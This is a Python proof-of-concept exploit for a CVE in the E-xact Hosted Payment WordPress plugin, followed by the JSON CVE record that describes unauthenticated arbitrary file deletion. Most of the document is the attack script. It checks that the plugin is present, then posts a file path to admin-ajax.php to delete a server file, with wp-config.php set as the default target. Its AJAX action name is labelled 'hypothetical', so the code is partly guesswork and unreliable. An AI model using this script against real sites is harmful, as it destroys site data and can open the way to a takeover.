CVE-2025-14829

import requests import sys # CVE-2025-14829 PoC - WordPress E-xact Hosted Payment Plugin Arbitrary File Deletion # This PoC demonstrates how an unauthenticated attacker can delete arbitrary files TARGET_URL = "http://target-wordpress-site.com" # Target file to delete (can be any file on the server) FILE_TO_DELETE = "wp-config.php" def delete_arbitrary_file(target_url, file_path): """ Delete arbitrary file via vulnerable E-xact Hosted Payment plugin """ # WordPress AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Construct malicious request # The plugin accepts file path without proper validation data = { "action": "exact_delete_file", # Hypothetical action name "file_path": file_path, # Arbitrary file path } try: response = requests.post(ajax_url, data=data, timeout=10) if response.status_code == 200: print(f"[+] File deletion request sent: {file_path}") print(f"[*] Response: {response.text}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def check_plugin_installed(target_url): """ Check if E-xact Hosted Payment plugin is installed """ plugin_url = f"{target_url}/wp-content/plugins/e-xact-hosted-payment/readme.txt" try: response = requests.get(plugin_url, timeout=10) if response.status_code == 200 and "E-xact" in response.text: print("[+] E-xact Hosted Payment plugin is installed") return True except: pass print("[-] Plugin not found or target is not WordPress") return False if __name__ == "__main__": if len(sys.argv) > 1: target_url = sys.argv[1] else: target_url = TARGET_URL print(f"[*] Target: {target_url}") print(f"[*] CVE-2025-14829 PoC - Arbitrary File Deletion\n") # Check if plugin is installed if not check_plugin_installed(target_url): print("[!] Exiting...") sys.exit(0) # Delete target file print(f"[*] Attempting to delete: {FILE_TO_DELETE}") delete_arbitrary_file(target_url, FILE_TO_DELETE)

{"cve": {"id": "CVE-2025-14829", "sourceIdentifier": "[email protected]", "published": "2026-01-13T06:15:49.310", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The E-xact | Hosted Payment | WordPress plugin through 2.0 is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server."}, {"lang": "es", "value": "El plugin de WordPress E-xact | Hosted Payment | hasta la versión 2.0 es vulnerable a la eliminación arbitraria de archivos debido a una validación insuficiente de la ruta de archivos. Esto permite a atacantes no autenticados eliminar archivos arbitrarios en el servidor."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "references": [{"url": "https://wpscan.com/vulnerability/872569bc-16fb-427f-accc-147f284137cd/", "source": "[email protected]"}]}}